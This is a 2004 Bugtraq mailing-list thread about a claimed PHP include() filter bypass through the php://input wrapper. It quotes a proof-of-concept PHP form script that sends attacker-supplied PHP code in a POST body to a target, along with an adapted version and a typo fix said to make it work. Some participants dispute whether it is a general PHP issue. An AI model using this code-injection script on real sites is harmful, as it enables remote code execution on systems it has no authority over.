Re: [PHP] include() bypassing filter with php://input

From: bugtraq subscriber (bugtraq_at_theorb.net)
Date: 05/28/04

  • Next message: Luca Falavigna: "Possible bug in PHPNuke and other CMS" 
    Date: Fri, 28 May 2004 13:22:24 -0700
To: bugtraq@securityfocus.com

    clez wrote:
    > Hi there!
    >
    > i use php 4.3.5 and tried this "proof of concept". i assumed, that the
    > form attribute "methode" is a typing mistake and adapted the exploit to
    > get it working under a php 4.3.x default configuration (it's kinda
    > paradox to use autoglobals in an exploit that aims to secure other
    > products).
    >
    > but even this adapted version (see below) does not show anything on
    > execution.

    Hi all,

    There's another typo in there.

          $message = "POST /".$_POST['file']."php://input HTTP/1.1\r\n";

       should be

          $message = "POST /".$_POST['file']." php://input HTTP/1.1\r\n";

    On my LAMP system the script performs as claimed.

    :m)

    >
    > this exploit seems to rely on a exploitable web service, that gets paths
    > to include files from a get variable named "page".
    >
    > so this seems to me like a (fixed/changed) bug at the single service
    > "www.exemple.com" (not to be mixed up with www.example.com from rfc
    > 2606) and not a general php issue.
    >
    > ############ snippet start ############
    > <form method="post" >
    > target server : <input type="text" name="server"/><br/>
    > file : <input type="text" name="file" /><br/>
    > exec : <input type="text" name="cmd" /><br/>
    > <input type="submit" value="send" />
    > </form>
    > <?php
    > if(is_array($_POST) && isset($_POST['cmd']) && isset($_POST['server'])
    > && isset($_POST['file'])){
    > $message = "POST /".$_POST['file']."php://input HTTP/1.1\r\n";
    > $message .= "Accept: */*\r\n";
    > $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    > $message .= "Accept-Encoding: deflate\r\n";
    > $message .= "Host: ".$_POST['server']."\r\n";
    > $message .= "Content-length: ".strlen($_POST['cmd'])."\r\n";
    > $message .= "\r\n";
    > $message .= urlencode($_POST['cmd'])."\r\n";
    > $fd = fsockopen($_POST['server'],80);
    > fputs($fd,$message);
    > while(!feof($fd)) {
    > echo fgets($fd,1280);
    > }
    > fclose($fd);
    > }
    > ?>
    > ############ snippet end ############
    >
    >
    > On Fri, 2004-05-28 at 06:51, Keary Suska wrote:
    >
    >>What exactly does your "proof of concept" do? I tried this on my system with
    >>PHP 4.34.x--which, by the way, is when support for php://input began, *not*
    >>3.0.13--and nothing happened whatsoever. Where's the proof?
    >>
    >>on 5/27/04 3:07 AM, lostnoobs@security-challenge.com purportedly said:
    >>
    >>
    >>>
    >>>Informations :
    >>>°°°°°°°°°°°°°°
    >>>Website : http://www.php.net
    >>>Version : PHP 3.0.13 =>
    >>>Problem : Inlude() bypassing filter
    >>>
    >>>
    >>>Proof of concept:
    >>>°°°°°°°° Exploit °°°°°°°°°
    >>><------------ cut here ---------------->
    >>><form action="" methode="post" >
    >>>target server : <input type="text" name="server" ><br>
    >>>file : <input type="text" name="file" ><br>
    >>>exec : <input type="text" name="cmd" ><br>
    >>><INPUT type="submit" value="send">
    >>></form>
    >>>
    >>><?
    >>>if($cmd){
    >>>$message = "POST /".$file."php://input HTTP/1.1\r\n";
    >>>$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
    >>>application/x-shockwave-flash, */*\r\n";
    >>>$message .= "Accept-Language: fr\r\n";
    >>>$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    >>>$message .= "Accept-Encoding: deflate\r\n";
    >>>$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
    >>>MyIE2)\r\n";
    >>>$message .= "Host: ".$server."\r\n";
    >>>$message .= "Content-length: ".strlen( $cmd )."\r\n";
    >>>$message .= "Connection: Keep-Alive\r\n";
    >>>$message .= "Cache-Control: no-cache\r\n";
    >>>$message .= "\r\n";
    >>>$message .= $cmd."\r\n";
    >>>$fd = fsockopen( $server, 80 );
    >>>fputs($fd,$message);
    >>>while(!feof($fd)) {
    >>>echo fgets($fd,1280);
    >>>}
    >>>fclose($fd);
    >>>}
    >>>?>
    >>><------------ cut here ---------------->
    >>>
    >>>target server = "www.exemple.com"
    >>>file = "index.php?page="
    >>>exec = "<? phpinfo(); ?>"
    >>>
    >>>Explaination
    >>>°°°°°°°°°°°°°°
    >>>You can bypassing filter protection who parse http:// or ftp:// ...
    >>>"php://input" allows to put data in the function include() by sending a
    >>>request with code php in POST methode.
    >>>
    >>>
    >>>For More details :
    >>>°°°°°°°°°°°°°°
    >>>http://fr2.php.net/manual/en/wrappers.php.php
    >>>irc.fr.worldnet.net #s-c
    >>>
    >>>Nourredine Himeur
    >>>
    >>>www.security-challenge.com
    >>>
    >>>This vulnerability was found by Slythers but he's too shy for publish the vuln
    >>>;)
    >>>
    >>>greetz : mum , daddy , tcpteam , Nyx
    >>>
    >>>
    >>>
    >>
    >>
    >>Keary Suska
    >>Esoteritech, Inc.
    >>"Leveraging Open Source for a better Internet"
    >>
    >
    >
    >
    >

  • Next message: Luca Falavigna: "Possible bug in PHPNuke and other CMS"